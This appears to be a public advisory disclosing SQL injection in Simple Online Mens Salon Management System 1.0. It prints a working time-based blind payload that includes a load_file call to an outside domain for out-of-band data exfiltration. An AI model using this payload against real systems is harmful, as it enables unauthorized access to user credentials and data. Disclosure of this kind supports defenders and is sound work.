Simple Online Mens Salon Management System 1.0 SQL Injection

2021.12.06

Credit: nu11secur1ty

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

## [MSMS](https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html)
## [Vendor](https://www.sourcecodester.com/users/tips23)
![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/MSMS/docs/Screenshot%202021-12-04%20175708.png)
## Description
The `password` parameter on MSMS 1.0 appears to be vulnerable to SQL
injection attacks. The predictive tests of this application interacted
with that domain, indicating that the injected SQL query was executed.
The attacker can retrieve all authentication and
information about the users of this system.
## Payload
```mysql
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=hacked' AND (SELECT 5469 FROM
(SELECT(SLEEP(5)))kYFm) AND 'eRWi'='eRWi&password=y3L!z9j!P2'+(select
load_file('\\\\525cg9hmf4ujg32elolcrk29s0yumlq9hc54svgk.nu11secur1typenetrationtestingengineer.net\\maq'))+'
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/MSMS)
## Proof and Exploit:
[href](https://streamable.com/fvwqq2)

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Simple Online Mens Salon Management System 1.0 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.